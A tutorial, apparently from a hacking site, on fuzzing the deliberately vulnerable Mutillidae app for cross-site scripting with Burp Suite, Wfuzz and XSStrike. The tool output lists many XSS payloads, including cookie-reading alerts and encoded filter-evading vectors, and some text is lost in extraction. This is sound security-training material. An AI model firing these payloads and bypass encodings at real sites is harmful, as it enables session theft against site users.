Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 19

Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrike

 By drd_

 11/28/2018 12:34 am

Cross-site scripting is one of the most common vulnerabilities found on the web today, with
repercussions of this type of flaw ranging from harmless defacement to sensitive data exposure.
Probing for XSS can be tedious and time-consuming for an attacker, but luckily there are tools
available to make things a little easier, including Burp Suite, Wfuzz, and XSStrike.

Fuzzing Overview

Fuzzing is a technique used to test applications for security flaws in an automated fashion. The
fuzzer, a piece of software designed to test for these flaws, provides malformed or random data as
input to a program in order to find bugs, usually leading to vulnerabilities in the context of security.
Generated input can be static, such as values loaded from a list, or random, and new fuzzers are even
starting to use algorithms to dynamically generate and input data.

 Don't Miss: Write an XSS Cookie Stealer in JavaScript to Steal Passwords

We will be using Mutillidae, a vulnerable web application, to test for XSS flaws. To get started, open
up Mutillidae, and on the left, browse to "OWASP Top 10," then "Cross Site Scripting," followed by
"Reflected," and finally "DNS Lookup." This will be our entry point for XSS fuzzing.

App 1Burp Suite

Burp Suite is a powerful tool used to test web applications for vulnerabilities. The free Community
Edition is included in Kali Linux. In its most common utilization, Burp is used as a proxy to intercept
and modify requests.

We need to configure our browser to work with Burp. In Firefox, go to "Preferences," and scroll all
the way down to the section titled Network Proxy. Click on the "Settings" button, select "Manual
proxy configuration," and enter as the HTTP Proxy and 8080 as the Port. Now, check "Use
this proxy server for all protocols," and make sure it is blank under No Proxy for.
Finally, click "OK," and everything should be configured correctly. You can then fire up Burp Suite and
start a new project. Navigate to the "Proxy" tab and ensure the "Intercept is on" button is pressed.
This will allow us to modify the request and fuzz for XSS.

Next, back in Mutillidae, enter a value in the Hostname/IP text box, and hit "Lookup DNS" to submit
the request (I just used – it doesn't really matter here). The request should show up in Burp
Right-click anywhere in the request window, and select "Send to Intruder," then navigate to the
"Intruder" tab. We will use the "Sniper" attack type to iterate through a list of payloads. Burp will
automatically select positions to use, which are the parameters to test, but for now, we only need
one. Hit the "Clear" button on the right, highlight the target host we entered earlier, and hit the
"Add" button.

Next, go to the "Payloads" tab, and under Payload Options, press "Load." There is a useful wordlist
located at /usr/share/wfuzz/wordlist/Injections/XSS.txt — browse to it and we are ready to launch
the attack.
Press "Start attack," and a new window will pop up. Once the attack has iterated through all the
payloads in our wordlist, the attack is finished and we can see all the requests and their status codes.
To demonstrate, let's take a look at request number 3. If we paste this payload into the DNS Lookup
utility, an alert box will pop up proving that this page is indeed vulnerable to XSS.

Before we move on to other tools, make sure your browser's proxy configuration is changed back to
use system settings.
App 2Wfuzz

Wfuzz is another popular tool used to fuzz applications not only for XSS vulnerabilities, but also SQL
injections, hidden directories, form parameters, and more. It is included in Kali by default.

To display help settings, type wfuzz -h at the terminal.

wfuzz -h

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL
sites. Check Wfuzz's documentation for more information.


* Wfuzz 2.2.11 - The Web Fuzzer *

* *

* Version up to 1.4c coded by: *

* Christian Martorella ([email protected]) *

* Carlos del ojo ([email protected]) *

* *

* Version 1.4d to 2.2.11 coded by: *

* Xavier Mendez ([email protected]) *


Usage: wfuzz [options] -z payload,params <url>

FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of
the specified payload.

FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request

performed and could be used as a base for filtering.


-h : This help

--help : Advanced help

--version : Wfuzz version details

-e <type> : List of available encoders/payloads/iterators/printers/scripts

-c : Output with colors

-v : Verbose information.

--interact : (beta) If selected,all key presses are captured. This allows you to
interact with the program.

-p addr : Use Proxy in format ip:port:type. Repeat option for using various

Where type could be SOCKS4,SOCKS5 or HTTP if omitted.


We will be testing the same page in Mutillidae for XSS vulnerabilities. Basic usage of Wfuzz includes
specifying a wordlist file including the payloads to use with the -z flag, and the URL to test, replacing
the parameter in question with FUZZ. We can also set the -c flag to get color output.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL
sites. Check Wfuzz's documentation for more information.


* Wfuzz 2.2.11 - The Web Fuzzer *



Total requests: 39


ID Response Lines Word Chars Payload


000020: C=200 514 L 1425 W 21898 Ch "<IMG%20SRC=`javascript:alert("'WXSS'")`>"

000019: C=200 514 L 1425 W 21812 Ch "<IMG

000021: C=200 514 L 1425 W 21983 Ch "<IMG

000001: C=200 514 L 1420 W 21769 Ch ""><script>""

000003: C=200 514 L 1420 W 21907 Ch "<<script>alert("WXSS");//<</script>"

000016: C=200 514 L 1425 W 21877 Ch "<IMG%20SRC="javascript:alert('WXSS')""

000015: C=200 514 L 1425 W 21893 Ch "<IMG%20SRC="javascript:alert('WXSS');">"

000002: C=200 514 L 1420 W 21870 Ch "<script>alert("WXSS")</script>"

000018: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=JaVaScRiPt:alert('WXSS')>"

000017: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=javascript:alert('WXSS')>"

000022: C=200 514 L 1425 W 21973 Ch "<IMG


000023: C=200 514 L 1425 W 21762 Ch "<IMG%20SRC='javasc


000024: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav


000025: C=200 514 L 1425 W 21757 Ch "<IMG


000027: C=200 514 L 1425 W 21757 Ch "<IMG


000030: C=200 514 L 1425 W 21903 Ch "<IMG


000029: C=200 514 L 1425 W 21903 Ch "<IMG


000026: C=200 514 L 1425 W 21757 Ch "<IMG


000028: C=200 514 L 1430 W 21747 Ch "<IMG


000031: C=200 514 L 1425 W 22060 Ch "<IMG%20SRC='%26%23x6a;avasc


000032: C=200 514 L 1425 W 21727 Ch "<IMG


000033: C=200 514 L 1425 W 21727 Ch "<IMG

000034: C=200 514 L 1425 W 21727 Ch "<IMG

000036: C=200 514 L 1425 W 22191 Ch


000037: C=200 514 L 1425 W 22196 Ch "%22%3E%3Cscript%3Edocument

000035: C=200 514 L 1425 W 21950 Ch "'%3CIFRAME


000039: C=200 514 L 1420 W 21763 Ch "'';!--"<XSS>=&{()}"

000038: C=200 514 L 1420 W 22883 Ch


000005: C=200 514 L 1420 W 21911 Ch "'><script>alert(document.cookie)</script>"

000004: C=200 514 L 1420 W 21895 Ch "<script>alert(document.cookie)</script>"

000006: C=200 514 L 1420 W 21916 Ch "'><script>alert(document.cookie);</script>"

000007: C=200 514 L 1420 W 21776 Ch "\";alert('XSS');//"

000008: C=200 514 L 1420 W 21875 Ch "%3cscript%3ealert("WXSS");%3c/script


000009: C=200 514 L 1420 W 21900 Ch "%3cscript%3ealert(document.cookie);%3c


000010: C=200 514 L 1425 W 21875 Ch "%3Cscript%3Ealert(%22X%20SS%22);


000011: C=200 563 L 1570 W 24175 Ch


000012: C=200 563 L 1570 W 24175 Ch


000013: C=200 514 L 1420 W 21964 Ch


000014: C=200 514 L 1425 W 21913 Ch "<IMG


Total time: 26.54032

Processed Requests: 39

Filtered Requests: 0
Requests/sec.: 1.469462

We can see each request ID, the response code, and information about that request. The payloads
from our wordlist file are also included, and near the bottom, there is data including total time and
the number of requests. Also of use, when fuzzing an application where many different response
codes might be encountered, the --hc flag can be utilized to ignore certain responses, such as 404

Another helpful feature of Wfuzz is the ability to encode payloads in order to bypass defensive filters
more effectively. To list the available encoders, use the following command.

wfuzz -e encoders

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL
sites. Check Wfuzz's documentation for more information.

Available encoders:

Category | Name | Summary


url_safe, url | urlencode | Replace special characters in string using the %xx escape. Letters,
digits, and

| | the characters '_.-' are never quoted.

url_safe, url | double urlencode | Applies a double encode to special characters in string using the
%25xx escape.

| | Letters, digits, and the characters '_.-' are never quoted.

url | uri_double_hex | Encodes ALL charachers using the %25xx escape.

html | html_escape | Convert the characters '&', '<' and '>' in string to HTML-safe

html | html_hexadecimal | Replaces ALL characters in string using the &#xx; escape

hashes | base64 | Encodes the given string using base64

url | doble_nibble_hex | Replaces ALL characters in string using the %%dd%dd escape

db | mssql_char | Converts ALL characters to MsSQL's char(xx)

url | utf8 | Replaces ALL characters in string using the \u00xx escape

hashes | md5 | Applies a md5 hash to the given string

default | random_upper | Replaces random characters in string with its capitals letters

url | first_nibble_hex | Replaces ALL characters in string using the %%dd? escape
default | hexlify | Every byte of data is converted into the corresponding 2-digit hex

| | n.

url | second_nibble_hex | Replaces ALL characters in string using the %?%dd escape

url | uri_hex | Encodes ALL charachers using the %xx escape.

default | none | Returns string without changes

hashes | sha1 | Applies a sha1 hash to the given string

url | utf8_binary | Replaces ALL characters in string using the \uxx escape

url | uri_triple_hex | Encodes ALL charachers using the %25%xx%xx escape.

url | uri_unicode | Replaces ALL characters in string using the %u00xx escape

html | html_decimal | Replaces ALL characters in string using the &#dd; escape

db | oracle_char | Converts ALL characters to Oracle's chr(xx)

db | mysql_char | Converts ALL characters to MySQL's char(xx)

Simply append the desired encoder (in this case urlencode) to the specified file, separated by a
comma, to encode the payloads.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL
sites. Check Wfuzz's documentation for more information.


* Wfuzz 2.2.11 - The Web Fuzzer *



Total requests: 39


ID Response Lines Word Chars Payload

000003: C=200 514 L 1420 W 21907 Ch "%3C%3Cscript%3Ealert%28%22WXSS

000002: C=200 514 L 1420 W 21870 Ch "%3Cscript%3Ealert%28%22WXSS


000001: C=200 514 L 1420 W 21769 Ch "%22%3E%3Cscript%3E%22"

000007: C=200 514 L 1420 W 21776 Ch "%5C%22%3Balert%28%27XSS


000005: C=200 514 L 1420 W 21911 Ch "%27%3E%3Cscript%3Ealert


000009: C=200 514 L 1420 W 21926 Ch "%253cscript%253ealert


000008: C=200 514 L 1420 W 21891 Ch "%253cscript%253ealert%28%22WXSS


000004: C=200 514 L 1420 W 21895 Ch "%3Cscript%3Ealert%28document.cookie


000010: C=200 514 L 1420 W 21901 Ch "%253Cscript%253Ealert%28%2522X


000006: C=200 514 L 1420 W 21916 Ch "%27%3E%3Cscript%3Ealert


000011: C=200 514 L 1420 W 21924 Ch "%26ltscript%26gtalert%28document.cookie


000015: C=200 514 L 1420 W 21903 Ch "%3CIMG%2520SRC%3D%22javascript


000012: C=200 514 L 1420 W 21968 Ch "%26ltscript%26gtalert%28document.cookie


000014: C=200 514 L 1420 W 21923 Ch "%3CIMG%2520SRC%3D%27javascript


000019: C=200 514 L 1420 W 21934 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert


000013: C=200 514 L 1420 W 21964 Ch "%3Cxss%3E%3Cscript%3Ealert


000016: C=200 514 L 1420 W 21887 Ch "%3CIMG%2520SRC%3D%22javascript


000017: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert


000018: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3DJaVaScRiPt%3Aalert

000020: C=200 514 L 1420 W 21908 Ch "%3CIMG%2520SRC%3D%60javascript

000022: C=200 514 L 1420 W 21983 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert


000021: C=200 514 L 1420 W 21993 Ch "%3CIMG%2520%22%22%22%3E%3CSCRIPT


000023: C=200 514 L 1425 W 21928 Ch "%3CIMG%2520SRC%3D%27javasc%09ript


000025: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav


000024: C=200 514 L 1425 W 21908 Ch "%3CIMG%2520SRC%3D%22jav%09ascript


000028: C=200 514 L 1420 W 21966 Ch "%3CIMG%2520SRC%3D


000027: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0D


000030: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520LOWSRC%3D%22javascript


000026: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0A


000029: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520DYNSRC%3D%22javascript


000031: C=200 514 L 1420 W 22118 Ch "%3CIMG%2520SRC%3D


000032: C=200 514 L 1420 W 22562 Ch "%3CIMG%2520SRC%3D%26%23106%3B


000033: C=200 514 L 1420 W 22967 Ch "%3CIMG%2520SRC%3D


000035: C=200 514 L 1420 W 21996 Ch "%27%253CIFRAME%2520SRC%3Djavascript


000034: C=200 514 L 1420 W 22507 Ch "%3CIMG%2520SRC%3D%26%23x6A


000036: C=200 514 L 1420 W 22191 Ch "%22%3E%3Cscript%3Edocument.location


000037: C=200 514 L 1420 W 22396 Ch "%2522%253E%253Cscript%253Edocument


000038: C=200 514 L 1420 W 22906 Ch "%27%3Balert%28String.fromCharCode


000039: C=200 514 L 1420 W 21796 Ch "%27%27%3B%21--%22%3CXSS%3E%3D


Total time: 27.33954

Processed Requests: 39

Filtered Requests: 0

Requests/sec.: 1.426505

The results are similar to before, but now the each payload is URL encoded.

App 3XSStrike

The last tool we will look at today is XSStrike. It is a dedicated suite for detecting cross-site scripting
vulnerabilities that includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and
more. XSStrike is currently in beta.

Before we can use this tool, we need to download it from GitHub and install it on our machine. The
process may vary slightly depending on the system, but for reference, I am using the latest version of
Kali. XSStrike works best with Python 3.

Download the tool using the wget utility in the terminal, as seen in the below command.


Next, extract the archive by typing unzip and changing into the extracted directory with
cd XSStrike-master. Now we should be able to run the tool by typing python3 at the

It may throw an error stating that the fuzzywuzzy module is not installed.


Traceback (most recent call last):

File "", line 35, in <module>

from core.checker import checker

File "/root/XSStrike-master/core/", line 3, in <module>

from fuzzywuzzy import fuzz

ModuleNotFoundError: No module named 'fuzzywuzzy'

If this is the case, just use pip3 install fuzzywuzzy to install the missing module. Now we should be
good to go.

To display the help menu, use the -h flag.

python3 -h

XSStrike v3.0-beta

usage: [-h] [-u TARGET] [--data DATA] [--fuzzer] [--update]

[--timeout] [--params] [--crawl] [-l LEVEL] [--headers]

[-t THREADS] [-d DELAY] [--skip-poc] [--skip-dom]

optional arguments:

-h, --help show this help message and exit



--data DATA post data

--fuzzer fuzzer

--update update

--timeout timeout

--params find params

--crawl crawl

-l LEVEL, --level LEVEL

level of crawling

--headers add headers

-t THREADS, --threads THREADS

number of threads
-d DELAY, --delay DELAY

delay between requests

--skip-poc skip poc generation

--skip-dom skip dom checking

XSStrike's basic usage is quite simple — use the -u flag followed by the URL to test.

python3 -u

XSStrike v3.0-beta

[~] Checking for DOM vulnerabilities


52 //document.getElementById("idSystemInformationHeading").innerHTML =

53 document.getElementById("idHintsStatusHeading").innerHTML = 'Hints: ' +


54 document.getElementById("idSecurityLevelHeading").innerHTML = 'Security
Level: ' + l_securityLevel + ' (' + l_securityLevelDescription + ')';

446 Google Hacking Database

495 <a onclick="document.location.href='';"

584 window.localStorage.setItem("LocalStorageTarget","This is set by the

index.php page");

585 window.sessionStorage.setItem("SessionStorageTarget","This is set

by the index.php page");


[+] Potentially vulnerable objects found

[+] WAF Status: Offline

[!] Testing parameter: page

[!] Reflections found: 4

[~] Analysing reflections

[~] Generating payloads

[!] Payloads generated: 9256


[+] Payload: "><A%0aoNMOUseoveR%0d=%0d(confirm)() x>z

[!] Efficiency: 100

[!] Cofidence: 10

[?] Would you like to continue scanning? [y/N]

This tool begins by checking for DOM-based XSS vulnerabilities, and the potentially vulnerable
parameters are displayed on the screen. Reflected XSS is tested for next, and the interactive payload
generator displays the payload and the projected likelihood of success. To continue scanning, hit y at
the prompt.


[+] Payload: "><d3v%0aONPoINtERENtER+=+(confirm)()>z

[!] Efficiency: 100

[!] Cofidence: 10

[?] Would you like to continue scanning? [y/N]

We can also skip the DOM-based checking with the --skip-dom option.

python3 -u --skip-dom

XSStrike v3.0-beta

[+] WAF Status: Offline

[!] Testing parameter: page

[!] Reflections found: 4

[~] Analysing reflections

[~] Generating payloads

[!] Payloads generated: 9256


[+] Payload: "><HtmL%09oNPoINterENtEr%0d=%0dconfirm() x//

[!] Efficiency: 100

[!] Cofidence: 10

[?] Would you like to continue scanning? [y/N]

XSStrike also contains fuzzing capabilities used to test filters and WAFs. This can be extremely slow,
though, because it uses random delay requests to probe the application. To speed things up, we can
set the delay to one second with the -d flag alongside the --fuzzer option.

python3 -u --skip-dom

--fuzzer -d 1
XSStrike v3.0-beta

[+] WAF Status: Offline

[!] Fuzzing parameter: page

[passed] <test

[passed] <test//

[passed] <test>

[passed] <test x>

[passed] <test x=y

[passed] <test x=y//

[passed] <test/oNxX=yYy//

[passed] <test oNxX=yYy>

[passed] <test onload=x

[passed] <test/o%00nload=x

[passed] <test sRc=xxx

[passed] <test data=asa

[passed] <test data=javascript:asa

[passed] <svg x=y>

[passed] <details x=y//

[passed] <a href=x//

[passed] <emBed x=y>

[passed] <object x=y//

[passed] <bGsOund sRc=x>

[passed] <iSinDEx x=y//

[passed] <aUdio x=y>

[passed] <script x=y>

[passed] <script//src=//

There are many other features included in this tool, and there are sure to be even more as XSStrike
undergoes further development.

Wrap Up

Fuzzing is an extremely useful technique for discovering vulnerabilities in a timely and thorough
manner. Today, we explored three fuzzing tools in an effort to find XSS flaws in a vulnerable web
application: Burp Suite, Wfuzz, and XSStrike. Knowing how to use tools like these will improve your
effectiveness as a white hat hacker and lead you on the path to success.

Don't Miss: How to Find XSS Vulnerable Sites with the Big List of Naughty Strings

Want to start making money as a white hat hacker? Jump-start your white-hat hacking career with
our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get
over 60 hours of training from ethical hacking professionals.

You might also like